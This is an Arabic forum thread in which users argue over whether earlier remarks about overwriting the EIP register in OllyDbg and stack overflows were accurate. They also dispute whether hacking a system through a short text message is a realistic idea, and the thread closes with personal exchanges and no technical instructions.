لو انتا واضع برنامج فى الolly وتم الكتابه على الEIP قصدى قيمت الEIP :) لن يتم استراجعه ابدا الا فى حاله عمل restart

للبرنامج

-

--------------------منقول

فقط اريد تنبيهك يا أخي فلا تأخذ كلامي على محمل تحدي أو استخفاف بقولك , فانا لم اقل أنك جايب الكلام ده من بيتك أو غيره , كل ما في الأمر أني طلبت المصادر لكي أعرف أين الخطأ

-------------------منقول

------------------منقول

ارجوا مراجعة السمبلي اكثر من ذلك , لأن في لبس كبير في هذا التعليق , ولا تكن مصدار معلوماتك الوحيد هو دروس الكراك , لأن في الغالب بتكون بتشرح لناس لديها المعرفه السابقه بالأسمبلي

------------------منقول

على العموم الخطا الوحيد او لا اعتبره خطا ولكن سوء فهم

عندما تزداد القيمه من 10 الى 20 فانا لا اقصد بالزياده فى المتغير نفسه ولكن الزياده تكون فى عدد الحروف المدخله بواسطه الinput

المتعارضه مع قيمت المتغير الموجوده فى الstack فقط لاغير!!!!

والحمد لله لم ارى اى لبس فى التعليق كما تقول

والحمد لله فان عقلى لم يتجمد على دروس الكراك فقط

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

-------------------------منقول

بصراحه انا شايف ان الموضوع ده غير منطقى بالمره

اولا لازم تقولنا معلومات عن الثغره دى وهى مكتوبه باى لغه

مش نخمن انها بالجافا او غيره وبعدين القنوات دى بيكون ليها انظمه كبيره بتشتغل عليها

-------------------------منقول

لا علم كل واحد يكتب غير منطقى غير منطقى

سوال:-

هل فكره اختراق الكومبيوتر والعبث به هل هذه ايضا فكره غير منطقيه ؟؟؟؟!!!!

انا من راى :- الفكره التى لم تنفذ او لم تكتمل تقولوا عليها غير منطقيه ؟؟؟!!!

والفكره التى لم تنفذ وبعد كده اتنفذت واتحققت تقولوا منطقيه؟؟؟؟!!!

ما هذا التناقض ؟؟ لا اعرف!!!

انا لا اقصد اعضاء ولكن اقصد الناس كلها الى من النوع ده وللاسف ان الغالبيه موجوده فى الوطن العربى

وللاسف الغرب لو لاقوا فكره يتبنوها ويكبروها ولا ياخذونها بانها فكره مستحيل العمل فيها

لا اعلم حتى الخبره وصلت لعلوم الكومبيوتر ايضا!!!؟؟؟

يعنى لازم تكون طالع معاش عشان يكون عندك خبره بالكومبيوتر :) انا ضد الفكر ديه وهاسئل سوال واحد فقط!!

بيل جيتش بنى نظام تشغيل وهو عنده كام سنه؟؟؟؟

غير كل هذا ال(الفتى)!!!

يا اخ ahmedalbasha بدام انا بقول حجات على سبيل التخمينات ممكن تقولنا ايه هيه الانظمه الكبيره الى حضرتك

اشرت عليها؟؟!!!!

على العموم هذا اخر رد لى وبالتوفيق والى اللقاء...

تم تعديل بواسطه bigboss1988
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

أولاًً

المنطق هو مايحكم عمل المبرمجين فنحن لسنا مشعوذين يجب أولا أن تكون الفكرة منطقية أي قابلة للتنفيذ من خلال المعطيات و المعلومات التي أملكها بمعنى أن لا يأتي شخص مبتدئ بالبرمجة و يقول سأبداّ بكتابة نظام تشغيل !!!!!!!! هل تصميم نظام التشغيل مستحيل ؟ لا, و لكنه غير منطقي لشخص مبتدئ و معلوماته ضحلة... و هذا ما نحاول اقناعك به

فأنت تحاول كسر نظام لاتعرف عنه أي شئ سوى ماتراه مثلنا على الشاشة فلم تر أي نظام مشابه و لا تعلم كيف تتم برمجته أو حتى تصميمه و تريد أن تخترقه عن طريق رسالة لا تتعدى 160 حرف ....................... هل هذا منطقي؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

ثانياً

Bill Gates كان طالباً في جامعة هارفارد واحدة من أرقى جامعات العالم كما أنه كان يعمل في شركة IBM و أيضاً لم يكن ليحاول أن يبني نظام تشغيل بمفرده فنظام الDOS بني على فكرة نظام OS/2 من IBM كما أنه لم يكن بمفرده و أيضاً لا مجال هنا للمقارنة

ثالثاً مع احترامي الشديد

و الله أنا لم أرى أحداً يُفتي هنا غيرك

تم تعديل بواسطه bashmohandes
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

----------------------منقول

ثالثاً مع احترامي الشديد

و الله أنا لم أرى أحداً يُفتي هنا غيرك

----------------------منقول

اسمحلى بردين فقط فى هذا الموضوع والثانى فى هذا اللينك

http://www.arabteam2000-forum.com/index.php?showtopic=75944

الحمد لله

عشان بس نشوف مين الى بيفتى وخلاص من غير وجه علم :)

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

أساساً أنا لم أفتي... فالمعلومة بوجه عام صحيحة 100%

و إذا كنت تريد أن تبحث ورائي فابحث كما شئت فلن تجد سوى مايجعلك تعرف أنك مجرد Rookie في مجالنا ......

و بدلاً من أن تبحث واهماً عن أخطائي حاول أن تُدافع عن ما ثبت فيه افتاءك هنا

سلام

تم تعديل بواسطه bashmohandes
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
زوار
This topic is now closed to further replies.

  • يستعرض القسم حالياً   0 members

    لا يوجد أعضاء مسجلين يشاهدون هذه الصفحة .